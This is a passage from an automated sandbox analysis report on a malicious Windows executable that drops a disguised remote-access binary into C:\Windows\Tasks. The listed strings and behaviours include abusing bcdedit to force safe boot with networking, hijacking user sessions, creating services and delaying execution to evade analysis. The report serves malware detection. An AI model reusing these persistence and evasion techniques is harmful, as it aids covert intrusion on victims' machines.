                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\Ivn55G.PqhJnUJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\ndymzn.PPYh2uJump to dropped file
                          Source: Fgyxfc.Qnwi4I.0.drBinary or memory string: bcdedit.exe
                          Source: Fgyxfc.Qnwi4I.0.drBinary or memory string: WTSGetActiveConsoleSessionIdkernel32WTSQueryUserTokenWtsapi32.dllWinsta0\Winlogon\winsta.dllWinStationQueryInformationW\\.\Pipe\TerminalServer\SystemExecSrvr\%d_runservice_commandline -service_runSeTcbPrivilegewinlogon.exeWTSEnumerateProcessesAwtsapi32WTSFreeMemoryWinsta0\Winlogonwinsta.dlluser32.dllWinStationConnectWLockWorkStationGlobal\SessionEventUltraHost name unavailableIP address unavailable%d., Global\SessionEventUltraCadsas.dllSendSAScad.exeWTSEnumerateSessionsAConsoleLockWorkstation failed with error 0x%0XRegisterServiceCtrlHandlerExAadvapi32.dllProvides secure remote desktop sharingSYSTEM\CurrentControlSet\Services\%sFailed to open service control managerTcpipFailed: Permission deniedFailed to create a new serviceFailed to open the serviceFailed to query service statusFailed to delete the service" -serviceNetworkSYSTEM\CurrentControlSet\Control\SafeBoot\%s\%sServiceSYSTEMDRIVE/boot.inidefaultboot loaderoperating systems /safeboot:networkSystemRoot\system32\bcdedit.exe/set safeboot networkSeShutdownPrivilege-rebootforce-rebootsafemode/deletevalue safebootSOFTWARE\Microsoft\Windows\CurrentVersion\PoliciesSystemSoftwareSASGeneration-delsoftwarecad-softwarecadding_dong.wavRICHED32.DLL------------------------------------------------------------------------------------------------------------------------
                          Source: Fgyxfc.Qnwi4I.2.drBinary or memory string: bcdedit.exe
                          Source: Fgyxfc.Qnwi4I.2.drBinary or memory string: WTSGetActiveConsoleSessionIdkernel32WTSQueryUserTokenWtsapi32.dllWinsta0\Winlogon\winsta.dllWinStationQueryInformationW\\.\Pipe\TerminalServer\SystemExecSrvr\%d_runservice_commandline -service_runSeTcbPrivilegewinlogon.exeWTSEnumerateProcessesAwtsapi32WTSFreeMemoryWinsta0\Winlogonwinsta.dlluser32.dllWinStationConnectWLockWorkStationGlobal\SessionEventUltraHost name unavailableIP address unavailable%d., Global\SessionEventUltraCadsas.dllSendSAScad.exeWTSEnumerateSessionsAConsoleLockWorkstation failed with error 0x%0XRegisterServiceCtrlHandlerExAadvapi32.dllProvides secure remote desktop sharingSYSTEM\CurrentControlSet\Services\%sFailed to open service control managerTcpipFailed: Permission deniedFailed to create a new serviceFailed to open the serviceFailed to query service statusFailed to delete the service" -serviceNetworkSYSTEM\CurrentControlSet\Control\SafeBoot\%s\%sServiceSYSTEMDRIVE/boot.inidefaultboot loaderoperating systems /safeboot:networkSystemRoot\system32\bcdedit.exe/set safeboot networkSeShutdownPrivilege-rebootforce-rebootsafemode/deletevalue safebootSOFTWARE\Microsoft\Windows\CurrentVersion\PoliciesSystemSoftwareSASGeneration-delsoftwarecad-softwarecadding_dong.wavRICHED32.DLL------------------------------------------------------------------------------------------------------------------------
                          Source: sync_browser.exe.6.drBinary or memory string: bcdedit.exe
                          Source: sync_browser.exe.6.drBinary or memory string: WTSGetActiveConsoleSessionIdkernel32WTSQueryUserTokenWtsapi32.dllWinsta0\Winlogon\winsta.dllWinStationQueryInformationW\\.\Pipe\TerminalServer\SystemExecSrvr\%d_runservice_commandline -service_runSeTcbPrivilegewinlogon.exeWTSEnumerateProcessesAwtsapi32WTSFreeMemoryWinsta0\Winlogonwinsta.dlluser32.dllWinStationConnectWLockWorkStationGlobal\SessionEventUltraHost name unavailableIP address unavailable%d., Global\SessionEventUltraCadsas.dllSendSAScad.exeWTSEnumerateSessionsAConsoleLockWorkstation failed with error 0x%0XRegisterServiceCtrlHandlerExAadvapi32.dllProvides secure remote desktop sharingSYSTEM\CurrentControlSet\Services\%sFailed to open service control managerTcpipFailed: Permission deniedFailed to create a new serviceFailed to open the serviceFailed to query service statusFailed to delete the service" -serviceNetworkSYSTEM\CurrentControlSet\Control\SafeBoot\%s\%sServiceSYSTEMDRIVE/boot.inidefaultboot loaderoperating systems /safeboot:networkSystemRoot\system32\bcdedit.exe/set safeboot networkSeShutdownPrivilege-rebootforce-rebootsafemode/deletevalue safebootSOFTWARE\Microsoft\Windows\CurrentVersion\PoliciesSystemSoftwareSASGeneration-delsoftwarecad-softwarecadding_dong.wavRICHED32.DLL------------------------------------------------------------------------------------------------------------------------
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF7400081AD GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetLastError,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStrin19_2_00007FF7400081AD
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF74000E1D0 GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetLastError,_itow,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivat19_2_00007FF74000E1D0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740059A40 GetPrivateProfileIntA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetPrivateProfileIntA,19_2_00007FF740059A40
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740057BD0 GetPrivateProfileIntA,19_2_00007FF740057BD0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740057C90 GetPrivateProfileIntA,19_2_00007FF740057C90
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740057D50 GetPrivateProfileIntA,19_2_00007FF740057D50
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740057E10 GetPrivateProfileIntA,19_2_00007FF740057E10
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740057650 GetPrivateProfileIntA,RegCreateKeyExA,RegCreateKeyExA,19_2_00007FF740057650
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740057EB0 GetPrivateProfileIntA,19_2_00007FF740057EB0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740057750 GetPrivateProfileIntA,RegCloseKey,RegCloseKey,RegCloseKey,19_2_00007FF740057750
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740057F50 GetPrivateProfileIntA,19_2_00007FF740057F50
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF7400577F0 GetPrivateProfileIntA,RegQueryValueExA,GetPrivateProfileIntA,19_2_00007FF7400577F0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF7400578E0 GetPrivateProfileIntA,RegQueryValueExA,RegQueryValueExA,GetPrivateProfileStringA,19_2_00007FF7400578E0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7400081AD GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetLastError,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStrin23_2_00007FF7400081AD
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF74000E1D0 GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetLastError,_itow,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivat23_2_00007FF74000E1D0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF740059A40 GetPrivateProfileIntA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetPrivateProfileIntA,23_2_00007FF740059A40
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF740057BD0 GetPrivateProfileIntA,23_2_00007FF740057BD0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF740057C90 GetPrivateProfileIntA,23_2_00007FF740057C90
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF740057D50 GetPrivateProfileIntA,23_2_00007FF740057D50
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF740057E10 GetPrivateProfileIntA,23_2_00007FF740057E10
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF740057650 GetPrivateProfileIntA,RegCreateKeyExA,RegCreateKeyExA,23_2_00007FF740057650
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF740057EB0 GetPrivateProfileIntA,23_2_00007FF740057EB0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF740057750 GetPrivateProfileIntA,RegCloseKey,RegCloseKey,RegCloseKey,23_2_00007FF740057750
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF740057F50 GetPrivateProfileIntA,23_2_00007FF740057F50
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7400577F0 GetPrivateProfileIntA,RegQueryValueExA,GetPrivateProfileIntA,23_2_00007FF7400577F0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7400578E0 GetPrivateProfileIntA,RegQueryValueExA,RegQueryValueExA,GetPrivateProfileStringA,23_2_00007FF7400578E0
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\4735396734841324Jump to behavior

                          Hooking and other Techniques for Hiding and Protection

                          barindex
                          Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (98).png
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF7400348B0 IsIconic,IsWindowVisible,GetWindowRect,SHAppBarMessage,19_2_00007FF7400348B0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7400348B0 IsIconic,IsWindowVisible,GetWindowRect,SHAppBarMessage,23_2_00007FF7400348B0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740005A60 LoadLibraryA,GetModuleFileNameA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,DeleteFileA,19_2_00007FF740005A60
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Tasks\sync_browser.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Tasks\sync_browser.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740069BC0 LoadLibraryA,GetProcAddress,GetProcAddress,GetSystemMetrics,GetCurrentProcessId,ProcessIdToSessionId,CreateToolhelp32Snapshot,Process32First,CloseHandle,FreeLibrary,ProcessIdToSessionId,ProcessIdToSessionId,CloseHandle,FreeLibrary,Process32Next,19_2_00007FF740069BC0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: OpenSCManagerA,EnumServicesStatusA,GetLastError,EnumServicesStatusA,OpenServiceA,QueryServiceConfigA,GetLastError,QueryServiceConfigA,CloseServiceHandle,CloseServiceHandle,19_2_00007FF740009D00
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: OpenSCManagerA,EnumServicesStatusA,GetLastError,EnumServicesStatusA,OpenServiceA,QueryServiceConfigA,GetLastError,QueryServiceConfigA,CloseServiceHandle,CloseServiceHandle,23_2_00007FF740009D00
                          Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 436Jump to behavior
                          Source: C:\Windows\Tasks\sync_browser.exeWindow / User API: threadDelayed 1366
                          Source: C:\Windows\SysWOW64\timeout.exeWindow / User API: threadDelayed 365
                          Source: C:\Windows\SysWOW64\timeout.exeWindow / User API: threadDelayed 362
                          Source: C:\Windows\SysWOW64\timeout.exeWindow / User API: threadDelayed 364
                          Source: C:\Windows\Tasks\sync_browser.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_19-22761
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Ivn55G.PqhJnUJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Windows\Tasks\Ivn55G.PqhJnUJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Windows\Tasks\conhost.exeJump to dropped file
                          Source: C:\Windows\Tasks\sync_browser.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_19-22154
                          Source: C:\Windows\Tasks\sync_browser.exeAPI coverage: 3.6 %
                          Source: C:\Windows\Tasks\sync_browser.exeAPI coverage: 1.2 %
                          Source: C:\Windows\Tasks\sync_browser.exe TID: 8148Thread sleep time: -136600s >= -30000s
                          Source: C:\Windows\SysWOW64\timeout.exe TID: 7980Thread sleep count: 60 > 30
                          Source: C:\Windows\SysWOW64\timeout.exe TID: 8184Thread sleep count: 32 > 30
                          Source: C:\Windows\SysWOW64\timeout.exe TID: 8060Thread sleep count: 365 > 30
                          Source: C:\Windows\SysWOW64\timeout.exe TID: 8060Thread sleep time: -36500s >= -30000s
                          Source: C:\Windows\SysWOW64\timeout.exe TID: 7992Thread sleep count: 362 > 30
                          Source: C:\Windows\SysWOW64\timeout.exe TID: 7992Thread sleep time: -36200s >= -30000s
                          Source: C:\Windows\SysWOW64\timeout.exe TID: 7780Thread sleep count: 364 > 30
                          Source: C:\Windows\SysWOW64\timeout.exe TID: 7780Thread sleep time: -36400s >= -30000s
                          Source: C:\Windows\SysWOW64\timeout.exe TID: 7860Thread sleep count: 317 > 30
                          Source: C:\Windows\SysWOW64\timeout.exe TID: 7860Thread sleep time: -31700s >= -30000s
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\Tasks\sync_browser.exeLast function: Thread delayed
                          Source: C:\Windows\SysWOW64\timeout.exeLast function: Thread delayed
                          Source: C:\Windows\SysWOW64\timeout.exeLast function: Thread delayed
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeCode function: 0_2_00403387 GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,0_2_00403387
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeCode function: 0_2_00402EE6 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00402EE6
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF74002C210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,19_2_00007FF74002C210
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF7400BA228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,19_2_00007FF7400BA228
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740026DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,19_2_00007FF740026DD1
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740005910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose,19_2_00007FF740005910
